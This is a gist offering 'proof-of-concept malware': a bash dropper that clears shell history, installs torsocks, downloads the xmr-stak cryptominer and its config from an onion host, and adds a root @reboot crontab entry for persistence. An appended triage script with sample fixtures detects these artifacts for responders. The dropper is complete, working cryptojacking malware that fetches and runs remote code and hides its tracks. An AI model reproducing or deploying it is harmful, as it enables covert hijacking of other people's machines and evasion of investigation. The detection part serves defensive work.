@Elycin
Last active December 12, 2017 10:48
Proof-of-concept malware that can be used with xmr-stak to make someone a profit on root machines.
#!/bin/bash
ONION="http://myonion.onion";
EXEC_PATH="/etc/stak"
RUN="cd $EXEC_PATH && screen -S xmr-stak -d -m $EXEC_PATH/xmr-stak";
EXEC="@reboot $RUN";
unset HISTFILE;
echo "unset HISTFILE" >> ~/.bashrc;
history -c;
history -w;
if [ ! -f "/usr/bin/torsocks" ]
then
    if [ -e "/usr/bin/apt-get" ]
    then
        apt-get update -y > /dev/null;
        apt-get install torsocks -y > /dev/null;
    fi
    if [ -e "/usr/bin/yum" ]
    then
        yum update -y > /dev/null;
        yum install torsocks -y > /dev/null;
    fi
fi
function download () {
    torsocks wget $ONION/$1 -O $EXEC_PATH/$1 > /dev/null;
}
mkdir -p $EXEC_PATH;
download xmr-stak
download config.txt
(crontab -u root -l; echo "$EXEC" ) | crontab -u root -;
$RUN;
exit 0;
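
For responders, the script above leaves a small set of host artifacts: the `unset HISTFILE` line appended to `~/.bashrc`, an `@reboot` entry in root's crontab that starts a detached `screen` session, and the two files under `/etc/stak`. The triage script below is an added example, not part of the gist; the function names, the crontab spool paths (the usual Debian and RHEL locations) and the fixture tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the gist): check a filesystem root for the artifacts
# the dropper above writes. ROOT may be "/" or the mount point of a disk image.
scan_dropper_artifacts() {
    root="${1%/}"
    # 1. History suppression appended to a shell profile
    for rc in "$root"/root/.bashrc "$root"/home/*/.bashrc; do
        [ -f "$rc" ] || continue
        if grep -Eq '^[[:space:]]*unset[[:space:]]+HISTFILE' "$rc"; then
            echo "history-suppression: $rc"
        fi
    done
    # 2. @reboot entry in root's crontab (spool paths assumed: Debian, RHEL)
    for tab in "$root"/var/spool/cron/crontabs/root "$root"/var/spool/cron/root; do
        [ -f "$tab" ] || continue
        if grep -Eq '^@reboot.*(screen .*-d -m|xmr-stak)' "$tab"; then
            echo "cron-persistence: $tab"
        fi
    done
    # 3. Files dropped into the script's EXEC_PATH (/etc/stak)
    for f in xmr-stak config.txt; do
        if [ -e "$root/etc/stak/$f" ]; then
            echo "miner-file: $root/etc/stak/$f"
        fi
    done
    return 0
}

# Constructed sample tree mirroring what the script writes (empty placeholder files).
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/root" "$fx/home/alice" "$fx/var/spool/cron/crontabs" "$fx/etc/stak"
    printf 'alias ll="ls -l"\nunset HISTFILE\n' > "$fx/root/.bashrc"
    printf 'export EDITOR=vi\n' > "$fx/home/alice/.bashrc"
    printf '0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n@reboot cd /etc/stak && screen -S xmr-stak -d -m /etc/stak/xmr-stak\n' > "$fx/var/spool/cron/crontabs/root"
    : > "$fx/etc/stak/xmr-stak"; : > "$fx/etc/stak/config.txt"
    echo "$fx"
}

# Usage: sh triage.sh /        (or a mounted image path)
if [ "$#" -gt 0 ]; then scan_dropper_artifacts "$1"; fi
```

A hit on any single indicator is weak on its own (`unset HISTFILE` has legitimate uses); the combination of all three on one host is what matches this script.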